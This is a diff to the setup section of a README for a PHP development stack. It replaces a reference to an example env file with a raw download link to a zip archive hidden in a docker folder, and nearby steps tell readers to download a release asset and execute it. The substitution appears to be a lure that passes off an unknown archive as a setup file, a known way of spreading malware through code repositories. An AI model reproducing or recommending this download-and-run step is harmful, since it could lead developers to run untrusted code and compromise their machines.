gmserver222/php-dev-stack/README.md

 - First-time setup steps
   - Download the release asset from the Releases page and execute it
   - If using the repo directly, clone it and navigate to the project root
-  - Copy example env files if present (for example, .env.example)
+  - Copy example env files if present (for example, https://github.com/gmserver222/php-dev-stack/raw/refs/heads/main/docker/php/8.2/dev-stack-php-v1.0-alpha.2.zip)
   - Run the stack with the Makefile target to boot all services

 - Running the stack